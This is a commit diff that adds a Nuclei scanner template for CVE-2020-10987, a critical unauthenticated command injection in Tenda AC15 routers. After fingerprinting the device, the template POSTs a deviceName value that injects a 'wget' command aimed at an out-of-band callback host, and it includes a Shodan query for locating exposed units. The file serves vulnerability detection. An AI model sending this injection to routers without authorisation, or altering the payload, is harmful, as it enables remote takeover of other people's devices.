Create CVE-2020-10987.yaml

http/cves/2020/CVE-2020-10987.yaml

@@ -0,0 +1,61 @@
+id: CVE-2020-10987
+
+info:
+  name: Tenda AC15 AC1900 version 15.03.05.19 - Command Injection
+  author: pussycat0x
+  severity: critical
+  description: |
+    The goform/setUsbUnload endpoint of Tenda AC15 AC1900 version 15.03.05.19 allows remote attackers to execute arbitrary system commands via the deviceName POST parameter.
+  reference:
+    - https://blog.securityevaluators.com/tenda-ac1900-vulnerabilities-discovered-and-exploited-e8e26aa0bc68
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2020-10987
+    cwe-id: CWE-78
+    epss-score: 0.90188
+    epss-percentile: 0.99558
+    cpe: cpe:2.3:o:tenda:ac15_firmware:15.03.05.19:*:*:*:*:*:*:*
+  metadata:
+    shodan-query: http.title:"tenda wifi"
+    max-request: 2
+    vendor: tenda
+    product: ac15_firmware
+  tags: cve,cve2020,tenda,rce,kev,unauth
+
+variables:
+  payload: "wget http://{{interactsh-url}}"
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    redirects: true
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body,"<title>Tenda WiFi")'
+          - "contains(content_type, 'text/html')"
+          - "status_code == 200"
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        POST /goform/setUsbUnload HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Accept: */*
+
+        deviceName=test`;{{payload}};`
+
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"